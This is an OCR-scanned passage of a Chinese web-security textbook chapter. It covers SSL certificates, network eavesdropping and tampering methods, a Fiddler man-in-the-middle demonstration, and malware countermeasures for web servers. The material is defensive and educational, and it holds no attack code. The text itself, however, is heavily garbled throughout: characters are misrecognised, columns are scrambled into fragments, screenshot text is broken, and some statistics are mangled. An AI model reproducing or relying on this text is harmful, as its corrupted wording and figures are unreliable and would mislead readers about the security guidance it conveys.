域 。 锁 头 图 标 右 侧 就 是 以 英语 显示 的 企业 名 称 等 信息 。 




















图 7-6 ”EV-SSL 会 验证 企业 信息 的 真实 性 
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在 使 用 EV-SSL 以 外 的 证 书 的 时 候 ， 需 要 自己 确认 所 访问 网 站 的 域名 是 否 正 确 。 比 较 有 名 的 
网 站 由 于 其 域名 是 众所周知 的 ， 所 以 也 有 不 使 用 EV-SSL 证 书 的 ， 也 许 是 他 们 认为 普通 的 域名 认 
证 证 书 就 已 经 足够 了 。 根 据 证 书 的 种 类 不 同 ， 购 买 时 所 需要 的 费用 也 不 同 ， 所 以 要 根据 自己 网 站 
的 性 质 以 及 域名 的 认 知 程度 ， 来 综合 考虑 购买 哪 种 证 书 。 














OD http://www.cabforum.org/documents.html 
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专栏 : 免费 的 数字 证 书 
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服务 器 端 数 字 证 书 









































免费 的 域名 认证 证 书 。 以 
StartCom 提供 的 证 书 ， 可 以 
览 器 上 使 用 ， 即 使 是 IE6， 如 
于 这 种 免费 的 域名 认证 证 书 能 正常 

















COLUMN 


蜂 面 域名 认证 证 书 相对 来 说 价格 较 低 ， 购 入 门槛 也 不 高 ， 同 时 也 可 以 利 
色 列 的 公司 StartCom “就 是 一 个 能 免费 提供 域名 认证 证 书 的 公司 。 
正常 在 IE、Firefox、Google Chrome、Safari、Opera 等 最 新 版 的 浏 















































果 升 级 了 也 是 可 以 使 用 的 。 














于 域名 认证 以 及 加 密 通 信 ， 所 以 那些 因 成 本 原因 不 能 























采用 正式 SSL 或 者 使 用 自己 建立 的 认证 中 心 ( 即 自己 署名 的 证 书 ) 的 公司 ， 可 以 考虑 使 用 这 种 免 























针对 钓鱼 攻击 ， 采 用 容易 记忆 的 域名 是 很 有 效果 的 。 所 以 ， 可 以 考虑 使 用 下 面 列 出 的 属性 型 























费 的 电子 证 书 。 
使 用 便于 记忆 的 域名 
域名 。 
表 7-1 属性 型 域名 

运营 服务 组 织 域名 种 类 

企业 运营 服务 COJP 

政府 机 构 服务 GOJP 

地 方 团体 服务 TGF 

教育 机 构 服务 ACJP 或 者 .ED JP 


























申请 这 些 属 性 型 域名 的 时 候 ， 域 名 管理 机 构 会 对 申请 者 是 否 满足 申请 条 件 进行 审查 ， 此 外 ， 





还 有 1 个 团体 只 能 申请 1 个 域名 的 限制 。 所 以 可 以 认为 这 样 的 域名 是 不 太 容 易 用 来 作为 恶意 网 站 


域名 的 。 








因此 , 更 建议 Web 服务 运营 方 选 择 上 面 所 说 的 属性 型 域名 ， 而 不 是 像 .COM 这 样 的 通用 型 


域名 。 


OD http://www.startcom.org/ 
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7.3 ”防范 网 络 监听 、 算 改 的 对 策 





本 方 将 主要 讨论 一 下 Web 网 站 的 网 络 监 昕 、 自 改 攻击 的 对 策 。 首 先 还 是 会 完 对 网 络 监听 、 
算 改 的 方法 进行 说 明 ， 之 后 会 讨论 如 何 使 用 SSL 来 防范 网 络 监听 、 算 改 。 






































7.3.1 网 络 监 折 、 算 改 的 途径 


针对 Web 网 站 的 监听 及 算 改 主要 通过 以 下 方式 实现 。 




















令 通过 无 线 网 进行 监听 、 算 改 

在 无 线 网 中 传输 的 数据 ， 如 果 没 有 进行 加 密 的 话 ， 则 很 有 可 能 被 网 络 监听 到 。 网 络 监 听 发 生 
的 原因 主要 有 (1 ) 通信 内 容 没 有 被 加 密 ; (2 ) 使 用 了 已 被 破解 的 诸如 WEP 等 加 密 方法 ; (3 ) 使 用 
通用 密码 的 公用 无 线 网 ; (4 ) 使 用 假 的 无 线 热点 。 如 果 攻 击 者 设置 假 的 无 线 热点 ， 还 可 能 轻易 发 
动 网 络 自 改 攻击 。 


令 利用 交换 机 端口 镜像 

在 有 线 局 域 网 里 ， 有 可 能 利用 交换 机 的 镜像 端口 实现 网 络 监 听 。 不 过 这 种 方法 只 会 发 生 在 攻 
击 者 能 物理 接触 到 网 络 硬 件 的 条 件 下 。 但 是 即使 交换 机 没有 镜像 端口 ， 如 果 攻 击 者 能 修改 交换 机 
内 部 线路 的 话 ， 也 可 以 通过 让 通信 经 过 中 继 HUB 的 方法 来 实现 网 络 监 听 。 























令 利用 代理 服务 器 

如 果 攻 击 者 可 以 控制 代理 服务 器 的 话 ， 或 者 可 以 在 网 络 中 设置 代理 服务 器 的 话 ， 就 可 以 通 
过 让 HTTP 通信 经 过 代理 服务 器 来 实现 监听 。 而 且 ， 如 果 代 理 服务 器 支持 的 话 ， 还 可 以 实现 对 
HTTP 消息 的 算 改 。 本 书 实验 用 的 Fiddler 也 是 代理 服务 器 的 一 种 ， 也 可 以 用 来 实现 网 络 监听 和 
算 改 。 
























































令 伪装 成 DHCP 服务 器 

在 使 用 DHCP 的 局 域 网 环境 中 ， 可 以 通过 伪装 的 DHCP 服务 絮 ， 来 实现 伪装 DNS 或 者 默认 
网 关 的 IP 地 址 的 目的 。 一 旦 伪装 成 了 默认 网 关 的 卫 地 址 ， 就 和 ARP 欺骗 攻击 一 样 ， 所 有 的 网 
络 通信 都 会 通过 伪装 的 网 关 服务 器 ， 可 以 轻而易举 的 实现 网 络 监 听 和 复 改 。 如 果 能 伪装 成 DNS 
服务 需 的 卫 的 话 ， 那 么 就 和 下 面 要 说 到 的 DNS 缓存 污染 一 样 ， 发 起 伪装 攻击 。 

















使 用 ARP 欺骗 攻击 和 DNS 缓存 污染 攻击 ( DNS cache poisoning ) 
在 前 面 作为 网 站 伪装 的 方法 我 们 已 经 介绍 过 了 ARP 欺骗 攻击 和 DNS 缓存 污染 攻击 了 ， 这 两 
种 方法 同时 也 能 被 用 来 实现 网 络 监 听 和 自 改 攻击 。 通 过 这 些 方 法 ,攻击 者 会 使 用 在 自己 管理 下 的 
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路 由 器 或 者 反 向 代理 服务 器 来 对 用 户 通信 进行 中 继 ， 以 实现 网 络 监听 及 自 改 的 目的 。 





7.3.2 中间 人 攻击 


前 面 提 到 的 网 络 监听 和 得 改 方式 中 ， 有 一 种 方式 利用 了 监听 设备 的 中 继 功能 。 在 这 种 中 继 
型 监听 的 环境 下 ， 即 使 是 加 密 通 信 ， 也 可 能 实现 网 络 监听 和 算 改 。 这 种 方法 被 称 为 中 间 人 攻击 
( Man-In-Th-Middle Attack, MITM™M )。 

下 面 的 图 显示 了 中 间 人 攻击 的 大 概 示意 。 


7-7 ”中 间 人 攻击 的 例子 
标 网 站 


1 大 网 站 用 户 


代理 服务 器 等 















































中 间 人 攻击 如 图 7-7 所 示 ， 攻 击 者 在 用 户 和 目标 网 站 之 间接 入 自己 的 硬件 设备 ， 通 过 对 用 户 
和 目标 网 站 HTTPS 通信 的 连接 ， 来 实现 网 络 监听 和 往 改 。 图 中 通信 部 分 虽然 使 用 了 HTTPS 协 
议 ， 但 是 中 间 人 可 以 在 中 继 吉 上 进行 一 次 解密 操作 ， 根 据 需要 决定 是 否 修改 原 内 容 ， 然 后 再 次 加 
蜜 后 发 给 对 方 。 中 间 人 攻击 就 是 利用 这 样 的 方式 实现 了 网 络 监 听 和 和 修改 。 


会 





















































使 用 Fiddler 模拟 中 间 人 攻击 


为 了 加 深 对 中 间 人 攻击 的 理解 ， 我 们 使 用 Fiddler 来 模拟 一 下 如 何 进 行 中 间 人 攻击 。 首 先 ， 
启动 Fiddler 后 ， 选 择 Tools 菜单 里 的 “Fiddler Options”， 在 弹出 的 对 话 框 里 选择 “HTTPS” 页 。 


在 这 里 ， 选 中 “Capture HTTPS CONNECTs” 和 “Decrypt HTTPS traffic” 这 两 个 复 选 框 ， 如 
图 7-8 所 示 。 





图 7-8 将 Fiddler 设置 为 MITM 模式 


Fiddler Options 





[可 








General| HTTP5 |Extensions | Connections | Appearance | 


Fiddler is able to decrypt HTTPS sessions by re-signing traffic using a self-generated certificate, 








Skip decryption for the folowing hosts: 





Export Fiddler Root Certificate to Desktop Remove Interception Certificates 
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选中 了 这 两 项 后 ， 会 弹出 如 图 7-9 的 对 话 框 ， 在 这 个 对 话 框 里 选择 “No”。 
图 7-9 根 证 书 的 导入 确认 对 话 框 


WARNING: Sharp Edges! Read Carefully! 








;Fiddler generates a unique root CA certificate to intercept HTTPS traffic, 


”You may choose to have Windows trust this root certificate to avoid 
security warnings about the untrusted root certificate, You should 
ONLY click Yes' on a computer Used exclusively for TEST purposes, 


You should click 'No' unless you're very very sure, 


Trust the Fiddler Root certificate? 








这 时 候 再 去 访问 HTTPS 网 站 ,浏览 器 就 会 显示 安全 证 书 有 问题 的 提示 消息 ， 忽 上 略 这 个 提示 
继续 访问 网 站 。JInternet Explorer6 ( IE6) We “是 和 否 继续 ”的 对 话 框 ， 点 击 “ 是 ”之 后 继 
续 会 访问 HTTPS 网 站 。IE7 及 以 后 的 版 本 ， 可 以 通过 点 击 “ 继 续 浏览 此 网 站 (不 推荐 》” 继续 访 
问 HTTPS 网 站 。 下 图 7-10 就 是 这 之 后 访问 verisign 的 结果 。 














图 7-10 访问 HTTPS 网 站 





FTPTESEETTETTTTE TCF Internet Explor 


GO- @ eranple. jz/ sel 全 证 书 撒 吴 : 导航 已 肯 上 x| 国 | I 















@ 此 网 站 的 安全 证 书 有 问题 。 
此 网 站 出 具 的 安全 证 书 不 是 由 受信 任 的 证 书 颁发 机 构 颁 发 的 。 
安全 证 书 问题 可 能 显示 试图 欺骗 您 或 截获 您 向 服务 器 发 送 的 数据 。 


建议 关闭 此 网 页 ,并且 不 要 继续 浏览 该 网 站 。 
乱 单 击 此 处 关闭 该 网 页 。 

徊 继续 浏览 此 网 站 (不 推荐 )。 

加 详细 信息 





这 时 浏览 器 的 地 址 栏 变 为 粉红 色 ， 地 址 栏 右 边 也 出 现 了 “证 书 错误 ”的 提示 。 之 后 ， 就 可 以 
在 Fiddler 中 查看 监听 到 的 通信 内 容 了 。 当 然 ， 也 可 以 在 Fiddler 中 对 HTTP 通信 消息 进行 修改 。 
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图 7-11 成 功 监 听 到 HTTPS 通信 内 容 











r 
甘 Fiddler - HTTP Debugging Proxy eb 

File Edit Rules Tools View Help i 

jComment #3 Reissue X Remove - RE Al 评 是 Streaming yn |@ process Filter 哆 Find 区 Save i ”3 Launch 正 Rdlear Cache 2 




















SES < || © statistics| WM Inspectors | £ autoResponder | 8 Request Buider | ) Log | 回 Fiters | = Timeline 
0 ed ek Headers | Textyiew | WebForms | Hexyiew | Auth |[Raw | xmL | 

HTTP CONNECT ET https: /rm Nash-c. co. ip HTTP/1. 

HTTP CONNECT MN lAccept: Ds image/x-xbitmap, 1 image/pjpeg, application/x-ms-application, ap}l— 

NE UA-CPU: X86 

HTTP CONNECT Accept-Encoding: gzip, deflate 

HTTP ookie: un=35315; Utma=248442270.363192350.1280469387.1291104566.1291104910.7; Utmz=24844; 
User-Agent: oa 0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.5; SLCC1; .NET CLR 2.0.50; 
Host: www.hash-c. 
Connection: ER ve 有 
Accept-Language: ja 
























CONNECT www.hasHI 
www,hash-c,co,ip 











CONNECT www.hast 2 mm | 


CONNEcT wwwhest Find [vewn notenad ] 
www,hash-c,co,ip limage/ob: 
www,hash-c.co,ip jimage/ob: Transformer | Headers | TextYiew | ImageYiew | HexView | Webwiew | Auth Caching | Privacy Raw XML 


Www,hash-c,co,jp ji FTP7ZT 0 200 OK 
CONNECT ww s| Date: Wed, 01 Dec 2010 03:18:39 GMT 

CONNECT Server: Apache/2.2.14 (CUbuntu) 国 

CONNEC E Last-Modified: Sun, 26 Sep 2010 00:59:08 GMT 

CONNECT wy ETag: “16b60002- 4T32- -1e776f00" 


www,hash-c.co,ip 


WwW,hash-c,co， imagejbtl Connection: close 
pee content-Type: text/html; charset=UTF-8| 

















www,hash-c.co,ip jimagefbt 
CONNECT www,hast <!DOCTYPE HTML， UE Te "-AAW3CAADTD HTML 4.01 Transitional//EN"> 
<html 1ang=" ja 
CONNECT “www,hasH <head> 
CONNECT www,hash <tit1e> 水 一 上 -HASHI 羽 寻 儿子 7/ 闻 樟 式 会 社 <7title> 
<META http-equiv=" Content-Type” content="text/html; charset=UTF-87> 


i 二 


www,hash-c.co,ip jimage/bt] 
































www,hash-r.rn,in_fimanaihtt 用 | [m lll | 上 
了 
Find,,. View in Notepad 
时 Capturing 去 AlProcesses 1187 https: ffwww.hash-c,co,jpf 











从 上 面 的 操作 我 们 可 以 得 出 如 下 结论 。 














即使 是 使 用 SSL (HTTPS )， 通 过 中 间 人 攻击 也 能 实现 网 络 监听 和 算 改 
中 间 人 攻击 时 浏览 器 会 出 现 数字 证 书 错误 的 提示 


在 中 间 人 攻击 中 ， 对 连接 客户 端 通信 的 代理 服务 器 (在 这 个 例子 里 为 Fiddler ) 可 以 看 作 是 
一 个 Web 服务 器 。 浏 览 句 显示 的 数字 证 书 错误 ， 相 当 于 是 提示 了 存在 中 间 人 攻击 的 可 能 。 此 外 ， 
在 没有 使 用 正式 的 证 书 而 是 使 用 自己 署名 的 证 书 ， 或 者 证 书 的 域名 不 一 致 、 证 书 过 期 等 情况 下 ， 
浏览 器 也 会 提示 证 书 错误 。 这 时 修 就 不 能 区 分 是 证 书 有 问题 了 还 是 中 间 人 攻击 导致 的 。 








专栏 : 请 不 要 手动 安装 证 书 COLUMN 


在 上 面 使 用 Fiddler 模拟 中 间 人 攻击 的 例子 里 ， 我 们 在 图 7-9 的 对 话 框 里 选择 了 “No”， 如 
果 选 则 了 “Yes” 的 话 会 怎样 呢 ? 选择 “Yes” 的 话 ， 就 像 对 话 框 里 提示 的 那样 ， 会 将 Fiddler 生 
成 的 根 证 书 导入 到 Windwos， 这 时 候 在 MITM 模式 下 ， 浏 览 器 也 不 会 显示 证 书 错误 了 。 由 于 这 
时 候 Fiddler 被 IE 所 信赖 ， 所 以 经 过 Fiddler 的 HTTPS 通信 在 浏览 器 都 不 会 显示 错误 。 
由 于 这 属于 比较 危险 的 行为 ， 所 以 在 图 7-9 | “No” 进 行 模拟 实验 。 与 此 相同 ， 
如 果 个 人 电脑 感染 了 间谍 软件 ( Spyware ) 也 可 能 出 现 这 种 问题 。 那 样 的 话 ，SSL 就 不 能 发 挥 域 
名 认证 的 作用 了 。 
也 有 一 些 网 站 会 要 求 手 动 导 入 根 证 书 ， 这 同样 是 很 危险 的 行为 。 应 该 使 用 浏览 器 里 保存 的 正 
规 合 法 的 根 证 书 ， 或 者 通过 Windows Update 等 安全 的 方式 导入 的 根 证 书 。 
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但 是 这 只 是 适用 于 网 络 上 提供 服务 的 正式 网 站 ， 如 果 是 公司 内 部 自 建 的 CA 的 话 ( 私有 CA ) 
则 不 受 此 约束 .私有 CA 和 自己 署名 证 书 的 区 别 , 可 以 参考 高 木 浩 光 的 Blog 文章 “PKI 常 见 误区 ( 3 ) 
如 果 私 有 认证 中 心安 全 的 话 那 么 自 署 名 证 书 也 是 安全 的 ”1 
















































































7.3.3 对策 


合理 利用 正规 的 数字 证 书 加 SSL 通信 ， 就 可 以 有 效 的 预防 网 络 监 昕 和 算 改 。 此 外 ， 在 运用 
中 有 以 下 几 点 需要 注意 。 








使 用 SSL 时 的 注意 事项 

从 输入 页 面 就 开始 使 用 HTTPS 

这 是 因为 如 果 输 入 页 面 被 算 改 的 话 ， 就 不 能 保证 后 续 的 网 页 能 正常 的 进行 SSL 加 密 通 
信 了 
注意 Cookie 的 secure 属性 (参考 4.8.2 节 ) 
图 像 或 者 CSS 、JavaScript 等 也 需要 使 用 HTTPS 

如 果 图 像 被 算 改 了 ， 就 等 于 显示 的 页 面 也 被 算 改 了 。JavaScript 被 算 改 的 话 ， 就 可 能 
通过 JavaScript 代码 进一步 算 改 页 面 内 容 。 如 果 页 面 里 的 内 容 既 有 HTTP 也 有 HTTPS 的 
话 ， 那 么 浏览 器 就 会 弹出 如 图 7-12 的 那样 提示 框 。 


图 7-12 浏览 器 弹出 的 提示 框 
全 全 记 ul 


全 本 页 不 但 包含 实 全 的 内 容 ， 也 包含 不 实 全 的 内 容 。 
是 否 显示 不 安全 的 内 容 ? 





























































可 sw | wew | 


不 使 用 frame 和 iframe 

如 果 外 层 的 frame 没有 使 用 HTTPS 的 话 ， 那 么 浏览 器 的 地 址 栏 里 也 不 是 HTTPS 的 
网 址 ， 所 以 不 能 简单 地 通过 眼睛 来 确认 (内 部 frame ) 是 否 正 在 使 用 HTTPS。 此 外 ， 如 
果 frame 的 源 文件 地 址 链接 被 替换 了 的 话 ， 那 么 整个 页 面 的 内 容 也 会 被 替换 。 所 以 最 好 
的 选择 就 是 不 使 用 frame 和 iframe， 在 不 得 不 使 用 的 情况 下 ， 则 要 将 所 有 的 资源 都 放 在 
HTTPS 下 。 
























































中 高木 浩 光 . (2005 年 2 月 5 日 ) .PKI 上 《为 如 勘 连 Vs (3)「 了 也 个 穴 一 下 认证 局 办 要 当 左 户 才 志和 才 岂 认证 局 为 妥当 大 | 
( PKI 常见 误区 (3 ) 如 果 私 有 认证 中 心安 全 的 话 那么 自 署 名 证 书 也 是 安全 的 ) .参考 日 期 : 2011 年 1 月 13 日 ， 参 考 网 
址 : 高 木 浩 光 @ 自宅 日 记 : http://takagi-hiromitsu.jp/diary/20050205.html#p02 
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证 浏览 器 在 默认 设置 下 不 显示 错误 提示 


我 们 需要 保证 应 用 程序 在 不 修改 浏览 器 默认 的 “使 用 SSL2.0”: 
设置 时 也 不 让 浏览 器 提示 错误 。 由 于 SSL2. 在 协议 本 身 存在 缺陷 ， 


此 


ar’ 
警告 ” 等 





服务 器 端 设置 不 使 用 SSL2.0。 另 外 ， 如 果 将 “对 证 书 地 址 不 匹配 发 上 
失效 ， 服 务 顺 的 数字 证 书 也 就 失去 了 存在 的 意义 。 如 果 使 用 


的 话 ， 那 么 域名 认证 功能 将 会 


避 
| 


正规 的 域名 和 证 书 ， 那 么 浏览 需 也 就 不 需要 做 额外 的 设置 了 。 


不 隐藏 地 址 栏 
不 隐藏 状态 栏 
不 屏蔽 鼠标 右键 菜单 








“对 证 书 地 址 不 匹配 发 


所 以 需要 在 
设置 为 无 效 


J 
警告 


文 3 条 措施 都 是 为 了 让 用 户 方便 确认 证 书 有 效 性 。 因 为 标识 证 书 有 效 性 的 小 锁 头 标记 











会 显示 在 地 址 栏 或 者 状态 栏 里 ， 也 能 通过 右键 荣 
项 目 隐 藏 或 者 禁止 。 








专栏 : SSL 认证 标签 
些 证 

















二 


E， 所 以 不 能 把 这 些 





z 单 来 确认 证 书 的 有 效 怕 


COLUMN 
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网 页 的 HTML 代码 )。 访问 者 在 点 击 这 个 标 匀 
示 证 书 的 内 容 、 期 限 和 组 织 名 称 等 信息 。 

是 这 个 认证 标签 很 容易 被 伪造 。 虽然 有 类 似 “ 点 
者 的 网 站 有 可 能 显示 的 是 伪造 的 证 书 认证 
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如 果 浏 览 者 能 做 上 面 这 样 
以 说 与 其 花 时 间 去 确认 证 书 认 证 标签 的 真 伪 ， 
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证 书 认 证 标签 的 问题 不 仅 如 此 。 由 于 这 些 认 证 标签 
编写 ， 所 以 如 果 标 签 本 身 存 在 XS 
生 不 利 影响 。 从 这 点 意义 上 来 说 ,证 书 认证 

建议 大 家 在 确定 了 由 证 书 认 证 标签 带 
证 书 的 认证 标签 。 
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7.4 防范 恶意 软件 的 对 策 





本 节 中 我 们 将 说 明 Web 网 站 的 恶意 软件 (病毒 等 非法 软件 ) 防范 对 策 。 首 先 介 绍 一 下 预防 服 
务 顺 端的 恶意 软件 有 什么 意义 ， 然 后 再 详细 说 明 具 体 的 对 策 。 























7.4.1 什么 是 Web 网 站 的 恶意 软件 对 策 
Web 网 站 的 恶意 软件 对 策 主要 防范 以 下 情况 。 
( A ) Web 服务 器 自己 感染 恶意 软件 
( B ) 通 过 Web 网 站 传播 恶意 软件 
无 论 是 (A ) 还 是 (B)， 恶 意 软 件 都 是 保存 在 服务 器 上 的 ， 不同 的 是 (A ) 的 情况 下 ， 恶 意 软 
件 在 服务 器 上 运行 ， 而 ( B ) 的 话 亚 意 软件 并 不 在 服务 器 上 运行 ， 而 是 指 用 户 可 以 通过 网 页 下 载 
的 状态 。 
Web 服务 器 如 果 感 染 了 恶意 软件 的 话 ， 带 来 的 威胁 和 OS 命令 注入 攻击 一 样 。 比 如 可 能 存在 
如 下 的 威胁 。 
言 息 泄露 
网 站 被 算 改 
非法 使 用 其 他 功能 
作为 跳板 对 其 他 服务 器 发 起 攻击 
如 果 Web 服务 需 出 现 (B ) 的 情况 的 话 ， 则 会 带 来 如 下 影响 。 
浏览 网 页 的 用 户 PC 可 能 会 感染 恶意 软件 了 


下 面 ， 我 们 再 来 看 看 恶意 软件 都 是 如 何 感染 的 。 
























































7.4.2 ”恶意 软件 的 感染 途径 


根据 独立 行政 法 人 信息 处 理 推进 机 构 的 调查 2， 病 毒 的 感染 途径 主要 如 图 7-13 所 示 。 从 图 中 
可 以 看 出 ， 病 毒 的 感染 途径 中 电子 邮件 占 了 45$.2%， 上 网 占 了 48.3%， 外 置 存 储 (U 盘 、 移 动 硬 
盘 等 ) 和 外 部 设备 ( 带 和 人 本 公司 的 客户 PC 等 ) 占 了 48% (调查 为 多 项 选择 )。 





@ 前 提 是 用 户 PC 存在 漏洞 或 者 恶意 软件 被 执行 。 
@ 2009 年 日 本 国内 信息 安全 事件 受害 情况 调查 报告 地 址 http://www.ipa.go.jp/security/fy21/reports/isec-survey/。 
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7-13 个 人 电脑 病毒 的 入 侵 途 径 


( N=942 ) 


外 置 存储 、 带 入 公司 的 外 部 设备 ( 电脑 ) 














电子 邮件 
上 网 ( 浏览 网 页 等 ) 


自己 下 载 的 文件 





P2P( Peer to Peer ) 


等 文件 共享 软件 

















沁 
只 




















0% 


从 上 面 的 调查 结果 可 以 看 出 ， 
等 途径 传播 、 感 染病 毒 的 情况 较 多 。 但 是 在 Web 服务 器 上 一 般 不 会 做 这 样 的 操作 ， 所 以 Web 服 
途径 中 ， 利 用 系统 漏洞 的 比例 很 高 。 


务 右 感染 病毒 的 
一 般 情况 下 谈 到 恶 





| | 1 1 | 
20% 40% 60% 80% 100% 


通过 在 电脑 上 浏览 网 页 或 者 查看 邮件 ， 以 及 使 用 外 置 存储 设备 











区 意 软 件 的 解决 方法 ， 肯 定 很 多 人 会 先 想到 用 防 病毒 软件 ， 但 是 在 Web 服 





务 器 上 安装 防 病毒 软件 的 比率 还 不 是 特别 高 。 其 原因 就 是 服务 需 上 感染 恶意 软件 的 途径 和 普通 的 
客户 端 PC 有 所 不 同 。 


7.4.3 ”Web 网 站 恶意 软件 防范 对 策 概 要 
径 这 一 出 发 点 来 说 ，Web 服务 器 上 的 防范 恶意 软件 措施 有 以 下 几 点 非常 重要 。 


按时 进行 服务 器 的 漏洞 应 对 处 理 

不 在 服务 器 上 安装 、 运 行 来 历 不 明 的 软件 

在 服务 器 上 不 做 无 关 操 作 (浏览 网 页 或 者 查看 邮件 等 ) 

不 在 服务 器 上 使 用 USB 等 外 部 存储 设备 

将 Web 服务 器 和 公司 内 部 网 络 分 离开 

访问 服务 锅 的 客户 端 PC 安装 防 病毒 软件 并 保持 病毒 库 为 最 新 状态 

在 客户 端 PC 通过 Windows Update 等 方式 安装 最 新 的 安全 补丁 

首先 建立 能 切实 执行 上 述 对 策 的 体制 ， 如 果 对 上 面 的 措施 仍 感到 不 安 ( 比如 不 能 适时 实施 漏 

洞 对 策 等 ) 的 话 ， 再 考虑 在 服务 器 上 安装 防 病 毒 软件 。 


从 感染 
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7.4.4 如 何 确保 服务 器 不 被 恶意 软件 感染 
Web 服务 器 感染 恶意 软件 的 途径 一 般 来 说 有 如 下 几 种 。 


利用 Web 应 用 的 文件 上 传 漏洞 (参考 4.12 节 ) 

利用 Web 网 站 的 漏洞 进行 网 站 内 容 自 改 (参考 7.1 节 ) 

利用 FTP 等 管理 软件 非法 登录 (参考 7.1 节 ) 

管理 服务 器 的 PC 感染 了 恶意 软件 ， 服 务 器 被 PC 感染 (参考 7.4.3 节 ) 
网 站 内 容 被 恶意 软件 感染 (参考 7.4.3 市 ) 


这 些 感 染 途径 中 ， 除 了 利用 文件 上 传 功能 漏洞 以 外 ， 其 他 的 都 可 以 用 本 章 到 目前 为 止 所 讲述 
的 方法 进行 防范 。 关 于 利用 文件 上 传 漏洞 的 预防 ， 可 以 按照 后 面 要 讲 到 的 方法 进行 防范 。 


























D2 











探讨 是 否 需 要 制定 针对 恶意 软件 的 防范 措施 


用 户 上 传 文件 (图 片 、 免 费 软件 、PDF 文档 等 ) 的 恶意 软件 对 策 的 责任 ， 应 该 由 以 下 三 者 共 
同 承 担 。 


Web 网 站 运营 者 
上 传 文件 的 用 户 
下 载 、 查 看 文件 的 用 户 


网 站 需要 根据 自己 网 站 的 特点 来 决定 是 否 采 取 防 病毒 措施 。 具 体 来 说 可 以 根据 以 下 项 目 进行 
判断 。 

上 传 文件 的 公开 范围 

上 传 文件 是 否 有 明确 的 责任 人 

谁 对 上 传 文件 负 主 要 责任 

除了 防 病毒 软件 以 外 是 否 还 有 其 他 检查 方法 






































制定 病毒 防范 政策 并 向 用 户 公 


在 决定 了 是 否 要 对 恶意 软件 采取 措施 之 后 ， 应 该 以 网 站 用 户 规约 的 形式 把 防范 措施 (也 包括 
不 采取 任何 防范 措施 ) 向 网 站 用 户 公开 并 实施 。 需 要 公开 的 内 容 可 以 包括 以 下 几 条 。 


防范 病毒 的 方法 (不 做 病毒 防范 的 时 候 也 直接 标明 ) 

不 可 能 查 出 全 部 的 病毒 ， 感 染病 毒 的 可 能 性 也 不 是 零 (采取 了 防 病毒 措施 的 时 候 ) 
用 户 需要 自己 负责 (推荐 用 户 使 用 防 病毒 软件 并 保持 病毒 库 为 最 新 状态 ) 

作为 网 站 运营 方 不 对 用 户 感染 病毒 负责 任 



































364 | 第 7 章 如 何 提高 Web 网 站 的 安全 性 


上 面 这 些 条 目 都 是 一 般 性 的 内 容 ， 各 网 站 应 该 根据 自己 的 特点 ， 制 定 出 符合 自己 实际 情况 的 


使 用 防 病毒 软件 

要 想 对 用 户 上 传 的 文件 进行 病毒 扫描 ， 可 以 采取 的 方法 有 下 面 几 种 。 
在 服务 器 上 安装 防 病毒 软件 ， 将 文件 上 传 目 录 设 置 为 扫描 对 象 
使 用 防 病毒 网 关 
利用 防 病毒 软件 提供 的 API 在 自己 的 代码 里 进行 病毒 扫描 

详细 的 信息 可 以 向 防 病 毒 软 件 公 司 或 者 代理 商 咨询 。 

如 果 由 网 站 进行 病毒 检查 ， 可 以 借鉴 一 下 微软 的 免费 网 盘 Windows Live SkyDrive"， 请 参考 

下 面 的 网 站 截图 ”。 
7-14 ”Web 侧 进行 病毒 扫描 的 例子 ( Windows Live SkyDrive ) 


eo eicar.com contains a virus - SkyDrive 地 
四 人 Microsoft Corporation @ | skydrive.live.com /viruswarning.aspx/elcar.com?cid=5 © eades 





a SkyDrive lv 


eicar.com contains a virus 


SkyDrive has detected that eicar.com contains a virus that could harm your computer, We recommend 
that you cancel and do not continue to download this file. 


DD 1understand that downloading this file might harm my computer. 


Continue with download Cancel 


Get antivirus software to help protect your computer. 


ies 。 Developers Reportabuse English (United States) 








中 https://skydrive.live.com 
@ 页 面 现实 的 文件 eicar.com 并 不 是 真正 的 病毒 文件 ， 而 是 用 来 测试 防 病毒 软件 的 测试 文件 。 可 以 在 http://www.eicar. 
org/86-0-Intended-use.html 下 载 。 
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本 章 讲 到 的 一 些 防 病毒 软件 对 策 ， 对 抵御 Gumblar 也 有 很 好 的 效果 。 

“Gumblar” 是 一 种 组 合 了 Web 网 页 自 改 和 通过 浏览 网 页 感染 ( 仅 浏览 网 页 就 会 被 感染 的 病 
毒 ) 两 种 方法 的 一 种 病毒 传播 方式 。 

Gumblar 为 了 扩大 病毒 传播 范围 ， 会 资 取 FTP 用 户 名 和 密码 ， 然 后 再 用 这 些 账 号 信息 去 筑 
改 网 站 内 容 ， 进 而 再 去 感染 浏览 这 些 网 站 的 用 户 。 

如 果 采 用 了 本 章 所 介绍 的 安全 防范 措施 ， 使 用 公 钥 认证 的 SCP 或 SFTP 代替 传统 的 FTP， 
再 加 上 访问 IP 限制 ， 就 可 以 预防 非法 登录 攻击 了 。 而 且 如 果 客 户 端 PC 安装 了 防 病毒 软件 的 话 ， 
客户 端 也 就 可 以 避免 被 病毒 感染 了 。 

本 章 介绍 的 对 策 虽 然 都 是 最 基本 的 内 容 ， 但 是 如 果 熟 练 使 用 这 些 方法 的 话 ， 自 然 也 能 抵御 








































































































Gumblar。 
关于 Gumblar 的 详细 信息 ， 可 以 参考 http:/www.ipa.go.jp/securitytxt/2010/02outline.html[1]。 
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7.5 总 结 





围绕 如 何 提高 Web 网 站 的 安全 性 ， 本 章 主要 从 以 下 方法 进行 了 说 明 。 


针对 Web 服务 需 漏 洞 的 对 策 

由 管理 软件 导致 的 非法 登录 对 策 
防范 伪装 攻击 的 对 策 

防范 网 络 监听 、 和 修改 的 对 策 
防范 亚 意 软件 的 对 策 


上 面 提 到 的 每 种 方法 都 是 非常 常见 的 针对 Web 网 站 攻击 方法 的 防范 措施 。 这 些 服 务 器 对 策 
以 及 应 用 程序 本 身 的 安全 防范 措施 ， 都 是 确保 网 站 安全 性 所 必须 采取 的 措施 。 请 各 位 参考 本 章 的 
内 容 来 提高 网 站 的 安全 性 。 

另外 ， 关 于 如 何 防 范 钓 鱼 攻击 ， 也 请 参考 独立 行政 法 人 产业 技术 综合 研究 所 的 “建立 安全 
Web 网 站 的 铁 则 ”[1]。 
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开发 安全 的 Web 
应 用 所 需要 的 管理 


本 章 将 讲解 开发 安全 的 Web 应 用 所 需要 进行 的 管理 工作 。 
这 一 章 主要 是 面向 发 包 方 ( 甲 方 ) 的 相关 人 员 ， 以 及 实际 
划 行 开发 ( 承包 方 ， 乙 方 ) 的 项 目 经 理 。 
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8.1 开发 管理 中 的 安全 对 策 概要 


开发 管理 可 以 从 开发 体制 和 开发 过 程 两 方面 进行 控制 。 

